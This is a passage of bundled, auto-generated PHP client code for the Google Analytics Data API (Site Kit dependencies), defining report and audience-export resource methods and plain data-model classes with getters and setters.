\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport::class); } /** * Lists all audience exports for a property. This method can be used for you to * find and reuse existing audience exports rather than creating unnecessary new * audience exports. The same audience can have multiple audience exports that * represent the export of users that were in an audience on different days. See * [Creating an Audience Export](https://developers.google.com/analytics/devguid * es/reporting/data/v1/audience-list-basics) for an introduction to Audience * Exports with examples. Audience Export APIs have some methods at alpha and * other methods at beta stability. The intention is to advance methods to beta * stability after some feedback and adoption. To give your feedback on this * API, complete the [Google Analytics Audience Export API * Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. * (audienceExports.listPropertiesAudienceExports) * * @param string $parent Required. All audience exports for this property will * be listed in the response. Format: `properties/{property}` * @param array $optParams Optional parameters. * * @opt_param int pageSize Optional. The maximum number of audience exports to * return. The service may return fewer than this value. If unspecified, at most * 200 audience exports will be returned. The maximum value is 1000 (higher * values will be coerced to the maximum). * @opt_param string pageToken Optional. A page token, received from a previous * `ListAudienceExports` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListAudienceExports` must * match the call that provided the page token. * @return ListAudienceExportsResponse * @throws \Google\Service\Exception */ public function listPropertiesAudienceExports($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ListAudienceExportsResponse::class); } /** * Retrieves an audience export of users. After creating an audience, the users * are not immediately available for exporting. First, a request to * `CreateAudienceExport` is necessary to create an audience export of users, * and then second, this method is used to retrieve the users in the audience * export. See [Creating an Audience Export](https://developers.google.com/analy * tics/devguides/reporting/data/v1/audience-list-basics) for an introduction to * Audience Exports with examples. Audiences in Google Analytics 4 allow you to * segment your users in the ways that are important to your business. To learn * more, see https://support.google.com/analytics/answer/9267572. Audience * Export APIs have some methods at alpha and other methods at beta stability. * The intention is to advance methods to beta stability after some feedback and * adoption. To give your feedback on this API, complete the [Google Analytics * Audience Export API Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. * (audienceExports.query) * * @param string $name Required. The name of the audience export to retrieve * users from. Format: `properties/{property}/audienceExports/{audience_export}` * @param QueryAudienceExportRequest $postBody * @param array $optParams Optional parameters. * @return QueryAudienceExportResponse * @throws \Google\Service\Exception */ public function query($name, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QueryAudienceExportRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('query', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QueryAudienceExportResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Resource\PropertiesAudienceExports::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Resource_PropertiesAudienceExports'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Resource; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunPivotReportsRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunPivotReportsResponse; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunReportsRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunReportsResponse; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CheckCompatibilityRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CheckCompatibilityResponse; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metadata; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportResponse; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunRealtimeReportRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunRealtimeReportResponse; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportResponse; /** * The "properties" collection of methods. * Typical usage is: * <code> * $analyticsdataService = new Google\Service\AnalyticsData(...); * $properties = $analyticsdataService->properties; * </code> */ class Properties extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Returns multiple pivot reports in a batch. All reports must be for the same * GA4 Property. (properties.batchRunPivotReports) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). This property must be * specified for the batch. The property within RunPivotReportRequest may either * be unspecified or consistent with this property. Example: properties/1234 * @param BatchRunPivotReportsRequest $postBody * @param array $optParams Optional parameters. * @return BatchRunPivotReportsResponse * @throws \Google\Service\Exception */ public function batchRunPivotReports($property, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunPivotReportsRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchRunPivotReports', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunPivotReportsResponse::class); } /** * Returns multiple reports in a batch. All reports must be for the same GA4 * Property. (properties.batchRunReports) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). This property must be * specified for the batch. The property within RunReportRequest may either be * unspecified or consistent with this property. Example: properties/1234 * @param BatchRunReportsRequest $postBody * @param array $optParams Optional parameters. * @return BatchRunReportsResponse * @throws \Google\Service\Exception */ public function batchRunReports($property, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunReportsRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchRunReports', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunReportsResponse::class); } /** * This compatibility method lists dimensions and metrics that can be added to a * report request and maintain compatibility. This method fails if the request's * dimensions and metrics are incompatible. In Google Analytics, reports fail if * they request incompatible dimensions and/or metrics; in that case, you will * need to remove dimensions and/or metrics from the incompatible report until * the report is compatible. The Realtime and Core reports have different * compatibility rules. This method checks compatibility for Core reports. * (properties.checkCompatibility) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. To learn more, see [where to find your Property ID](https * ://developers.google.com/analytics/devguides/reporting/data/v1/property-id). * `property` should be the same value as in your `runReport` request. Example: * properties/1234 * @param CheckCompatibilityRequest $postBody * @param array $optParams Optional parameters. * @return CheckCompatibilityResponse * @throws \Google\Service\Exception */ public function checkCompatibility($property, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CheckCompatibilityRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('checkCompatibility', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CheckCompatibilityResponse::class); } /** * Returns metadata for dimensions and metrics available in reporting methods. * Used to explore the dimensions and metrics. In this method, a Google * Analytics GA4 Property Identifier is specified in the request, and the * metadata response includes Custom dimensions and metrics as well as Universal * metadata. For example if a custom metric with parameter name * `levels_unlocked` is registered to a property, the Metadata response will * contain `customEvent:levels_unlocked`. Universal metadata are dimensions and * metrics applicable to any property such as `country` and `totalUsers`. * (properties.getMetadata) * * @param string $name Required. The resource name of the metadata to retrieve. * This name field is specified in the URL path and not URL parameters. Property * is a numeric Google Analytics GA4 Property identifier. To learn more, see * [where to find your Property ID](https://developers.google.com/analytics/devg * uides/reporting/data/v1/property-id). Example: properties/1234/metadata Set * the Property ID to 0 for dimensions and metrics common to all properties. In * this special mode, this method will not return custom dimensions and metrics. * @param array $optParams Optional parameters. * @return Metadata * @throws \Google\Service\Exception */ public function getMetadata($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getMetadata', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metadata::class); } /** * Returns a customized pivot report of your Google Analytics event data. Pivot * reports are more advanced and expressive formats than regular reports. In a * pivot report, dimensions are only visible if they are included in a pivot. * Multiple pivots can be specified to further dissect your data. * (properties.runPivotReport) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). Within a batch request, this * property should either be unspecified or consistent with the batch-level * property. Example: properties/1234 * @param RunPivotReportRequest $postBody * @param array $optParams Optional parameters. * @return RunPivotReportResponse * @throws \Google\Service\Exception */ public function runPivotReport($property, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('runPivotReport', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportResponse::class); } /** * Returns a customized report of realtime event data for your property. Events * appear in realtime reports seconds after they have been sent to the Google * Analytics. Realtime reports show events and usage data for the periods of * time ranging from the present moment to 30 minutes ago (up to 60 minutes for * Google Analytics 360 properties). For a guide to constructing realtime * requests & understanding responses, see [Creating a Realtime Report](https:// * developers.google.com/analytics/devguides/reporting/data/v1/realtime-basics). * (properties.runRealtimeReport) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). Example: properties/1234 * @param RunRealtimeReportRequest $postBody * @param array $optParams Optional parameters. * @return RunRealtimeReportResponse * @throws \Google\Service\Exception */ public function runRealtimeReport($property, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunRealtimeReportRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('runRealtimeReport', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunRealtimeReportResponse::class); } /** * Returns a customized report of your Google Analytics event data. Reports * contain statistics derived from data collected by the Google Analytics * tracking code. The data returned from the API is as a table with columns for * the requested dimensions and metrics. Metrics are individual measurements of * user activity on your property, such as active users or event count. * Dimensions break down metrics across some common criteria, such as country or * event name. For a guide to constructing requests & understanding responses, * see [Creating a Report](https://developers.google.com/analytics/devguides/rep * orting/data/v1/basics). (properties.runReport) * * @param string $property A Google Analytics GA4 property identifier whose * events are tracked. Specified in the URL path and not the body. To learn * more, see [where to find your Property ID](https://developers.google.com/anal * ytics/devguides/reporting/data/v1/property-id). Within a batch request, this * property should either be unspecified or consistent with the batch-level * property. Example: properties/1234 * @param RunReportRequest $postBody * @param array $optParams Optional parameters. * @return RunReportResponse * @throws \Google\Service\Exception */ public function runReport($property, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('runReport', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Resource\Properties::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Resource_Properties'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class RunPivotReportResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'rows'; protected $aggregatesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $aggregatesDataType = 'array'; protected $dimensionHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionHeader::class; protected $dimensionHeadersDataType = 'array'; /** * @var string */ public $kind; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ResponseMetaData::class; protected $metadataDataType = ''; protected $metricHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricHeader::class; protected $metricHeadersDataType = 'array'; protected $pivotHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotHeader::class; protected $pivotHeadersDataType = 'array'; protected $propertyQuotaType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota::class; protected $propertyQuotaDataType = ''; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $rowsDataType = 'array'; /** * @param Row[] */ public function setAggregates($aggregates) { $this->aggregates = $aggregates; } /** * @return Row[] */ public function getAggregates() { return $this->aggregates; } /** * @param DimensionHeader[] */ public function setDimensionHeaders($dimensionHeaders) { $this->dimensionHeaders = $dimensionHeaders; } /** * @return DimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param ResponseMetaData */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ResponseMetaData $metadata) { $this->metadata = $metadata; } /** * @return ResponseMetaData */ public function getMetadata() { return $this->metadata; } /** * @param MetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return MetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param PivotHeader[] */ public function setPivotHeaders($pivotHeaders) { $this->pivotHeaders = $pivotHeaders; } /** * @return PivotHeader[] */ public function getPivotHeaders() { return $this->pivotHeaders; } /** * @param PropertyQuota */ public function setPropertyQuota(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota $propertyQuota) { $this->propertyQuota = $propertyQuota; } /** * @return PropertyQuota */ public function getPropertyQuota() { return $this->propertyQuota; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_RunPivotReportResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class RunPivotReportRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'pivots'; protected $cohortSpecType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortSpec::class; protected $cohortSpecDataType = ''; /** * @var string */ public $currencyCode; protected $dateRangesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DateRange::class; protected $dateRangesDataType = 'array'; protected $dimensionFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $dimensionFilterDataType = ''; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Dimension::class; protected $dimensionsDataType = 'array'; /** * @var bool */ public $keepEmptyRows; protected $metricFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $metricFilterDataType = ''; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metric::class; protected $metricsDataType = 'array'; protected $pivotsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Pivot::class; protected $pivotsDataType = 'array'; /** * @var string */ public $property; /** * @var bool */ public $returnPropertyQuota; /** * @param CohortSpec */ public function setCohortSpec(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortSpec $cohortSpec) { $this->cohortSpec = $cohortSpec; } /** * @return CohortSpec */ public function getCohortSpec() { return $this->cohortSpec; } /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param DateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return DateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param FilterExpression */ public function setDimensionFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param bool */ public function setKeepEmptyRows($keepEmptyRows) { $this->keepEmptyRows = $keepEmptyRows; } /** * @return bool */ public function getKeepEmptyRows() { return $this->keepEmptyRows; } /** * @param FilterExpression */ public function setMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param Pivot[] */ public function setPivots($pivots) { $this->pivots = $pivots; } /** * @return Pivot[] */ public function getPivots() { return $this->pivots; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param bool */ public function setReturnPropertyQuota($returnPropertyQuota) { $this->returnPropertyQuota = $returnPropertyQuota; } /** * @return bool */ public function getReturnPropertyQuota() { return $this->returnPropertyQuota; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_RunPivotReportRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Operation extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $done; protected $errorType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Status::class; protected $errorDataType = ''; /** * @var array[] */ public $metadata; /** * @var string */ public $name; /** * @var array[] */ public $response; /** * @param bool */ public function setDone($done) { $this->done = $done; } /** * @return bool */ public function getDone() { return $this->done; } /** * @param Status */ public function setError(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Status $error) { $this->error = $error; } /** * @return Status */ public function getError() { return $this->error; } /** * @param array[] */ public function setMetadata($metadata) { $this->metadata = $metadata; } /** * @return array[] */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param array[] */ public function setResponse($response) { $this->response = $response; } /** * @return array[] */ public function getResponse() { return $this->response; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Operation::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Operation'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class BetweenFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $fromValueType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue::class; protected $fromValueDataType = ''; protected $toValueType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue::class; protected $toValueDataType = ''; /** * @param NumericValue */ public function setFromValue(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue $fromValue) { $this->fromValue = $fromValue; } /** * @return NumericValue */ public function getFromValue() { return $this->fromValue; } /** * @param NumericValue */ public function setToValue(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue $toValue) { $this->toValue = $toValue; } /** * @return NumericValue */ public function getToValue() { return $this->toValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BetweenFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_BetweenFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class FilterExpressionList extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'expressions'; protected $expressionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $expressionsDataType = 'array'; /** * @param FilterExpression[] */ public function setExpressions($expressions) { $this->expressions = $expressions; } /** * @return FilterExpression[] */ public function getExpressions() { return $this->expressions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpressionList::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_FilterExpressionList'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DimensionExpression extends \Google\Site_Kit_Dependencies\Google\Model { protected $concatenateType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ConcatenateExpression::class; protected $concatenateDataType = ''; protected $lowerCaseType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CaseExpression::class; protected $lowerCaseDataType = ''; protected $upperCaseType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CaseExpression::class; protected $upperCaseDataType = ''; /** * @param ConcatenateExpression */ public function setConcatenate(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ConcatenateExpression $concatenate) { $this->concatenate = $concatenate; } /** * @return ConcatenateExpression */ public function getConcatenate() { return $this->concatenate; } /** * @param CaseExpression */ public function setLowerCase(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CaseExpression $lowerCase) { $this->lowerCase = $lowerCase; } /** * @return CaseExpression */ public function getLowerCase() { return $this->lowerCase; } /** * @param CaseExpression */ public function setUpperCase(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CaseExpression $upperCase) { $this->upperCase = $upperCase; } /** * @return CaseExpression */ public function getUpperCase() { return $this->upperCase; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DimensionExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class CaseExpression extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CaseExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_CaseExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DimensionCompatibility extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $compatibility; protected $dimensionMetadataType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionMetadata::class; protected $dimensionMetadataDataType = ''; /** * @param string */ public function setCompatibility($compatibility) { $this->compatibility = $compatibility; } /** * @return string */ public function getCompatibility() { return $this->compatibility; } /** * @param DimensionMetadata */ public function setDimensionMetadata(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionMetadata $dimensionMetadata) { $this->dimensionMetadata = $dimensionMetadata; } /** * @return DimensionMetadata */ public function getDimensionMetadata() { return $this->dimensionMetadata; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionCompatibility::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DimensionCompatibility'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class V1betaAudienceRow extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dimensionValues'; protected $dimensionValuesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\V1betaAudienceDimensionValue::class; protected $dimensionValuesDataType = 'array'; /** * @param V1betaAudienceDimensionValue[] */ public function setDimensionValues($dimensionValues) { $this->dimensionValues = $dimensionValues; } /** * @return V1betaAudienceDimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\V1betaAudienceRow::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_V1betaAudienceRow'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Metadata extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metrics'; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionMetadata::class; protected $dimensionsDataType = 'array'; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricMetadata::class; protected $metricsDataType = 'array'; /** * @var string */ public $name; /** * @param DimensionMetadata[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return DimensionMetadata[] */ public function getDimensions() { return $this->dimensions; } /** * @param MetricMetadata[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return MetricMetadata[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Metadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * 